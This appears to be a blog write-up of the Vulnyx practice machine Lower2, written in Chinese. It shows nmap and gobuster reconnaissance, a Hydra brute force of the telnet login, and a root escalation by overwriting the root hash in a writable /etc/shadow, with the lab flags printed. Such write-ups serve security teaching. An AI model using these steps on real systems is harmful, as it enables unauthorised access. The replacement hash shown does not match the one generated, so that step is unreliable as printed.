Vlx_Lower2

靶机来源: https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 15:10 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00027s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00024s latency).
MAC Address: 08:00:27:9E:AE:CF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.86
Host is up (0.00034s latency).
MAC Address: 08:00:27:72:41:CE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.46 seconds

靶机IP:192.168.2.86

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.86                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 15:11 +0800
Nmap scan report for 192.168.2.86
Host is up (0.000063s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
23/tcp open  telnet
80/tcp open  http
MAC Address: 08:00:27:72:41:CE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.16 seconds

开放端口:22、23、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,23,80 192.168.2.86
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 15:11 +0800
Nmap scan report for 192.168.2.86
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
23/tcp open  telnet  Netkit telnet-ssl telnetd
80/tcp open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:72:41:CE (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.24 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.86                       
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 15:12 +0800
Nmap scan report for 192.168.2.86
Host is up (0.00090s latency).
All 100 scanned ports on 192.168.2.86 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:72:41:CE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 60.53 seconds

二、WEB渗透

1、80端口

访问80端口,是nginx的页面,并没有运行着服务 img

2、目录扫描

进行目录扫描,没有任何信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.86
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              txt,bak,php,html,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1323348 / 1323348 (100.00%)
===============================================================
Finished

三、Telnet_Bruf

1、用户名发现

尝试使用ssh进行登录,发现了一个用户名b.taylor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~/miaosec]
└─# ssh root@192.168.2.86      
The authenticity of host '192.168.2.86 (192.168.2.86)' can't be established.
ED25519 key fingerprint is: SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:27: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.86' (ED25519) to the list of known hosts.

###################################################
### Welcome to Brian Taylor's (b.taylor) server ###
###################################################

root@192.168.2.86: Permission denied (publickey).

2、Telnet爆破

使用hydra对telnet服务进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# hydra -l b.taylor -P /usr/share/wordlists/rockyou.txt telnet://192.168.2.86:23 
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-13 15:32:25
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking telnet://192.168.2.86:23/
[23][telnet] host: 192.168.2.86   login: b.taylor   password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-13 15:32:47

成功获取到用户b.taylor的telnet密码是rockyou

3、获取b.taylor的权限

使用凭证进行登录,成功获取到权限

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# telnet 192.168.2.86
Trying 192.168.2.86...
Connected to 192.168.2.86.
Escape character is '^]'.


lower2 login: b.taylor
Password: 
Last login: Fri Mar 13 07:57:30 CET 2026 on pts/4
b.taylor@lower2:~$ id
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)

四、权限提升

查看到/etc/shadow可写

1
2
b.taylor@lower2:~$ ls -la /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16  2025 /etc/shadow

直接将shadow里面root密码的哈希值进行替换即可

  1. 生成哈希值
1
2
3
┌──(root㉿kali)-[~]
└─# mkpasswd --method=yescrypt 123456
$y$j9T$3.3Y7B3biOLNIZOUCs3PZ/$EVCRYeCC7hks8CF0E/zjvy1LSfaqrhoQJyANminc.O0
  1. 替换shadow里面的哈希值
1
2
3
4
5
6
7
b.taylor@lower2:~$ head -n1 /etc/shadow
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::

b.taylor@lower2:~$ nano /etc/shadow

b.taylor@lower2:~$ head -n1 /etc/shadow
root:$6$abcdefgh$fsQAa16ibv7N/pkIMTWAm9JGNGOIC4zzMpCqrfg2f6e5sTkTI49pdvKD4Wjy8PO6mzddXEf0oICL6PtgHim/F.:20134:0:99999:7:::
  1. 使用密码123456切换到root用户
1
2
3
4
b.taylor@lower2:~$ su root
Contraseña: 
root@lower2:/home/b.taylor# id
uid=0(root) gid=0(root) grupos=0(root)

五、查看FALG

1
2
3
root@lower2:/# cat /root/root.txt /home/b.taylor/user.txt 
235aa90b688b711a87d5d15c6e34dada
edc9f5c55af87505033a20dd41931364
Vulnyx
#Hydra #TCP23_Telnet #SSH_Banner #Shadow可写
Vlx_Lower2
http://miao-sec.github.io/Vulnyx/Vlx-Lower2/
作者
Miao
发布于
2026年3月13日
许可协议
BY-MIAO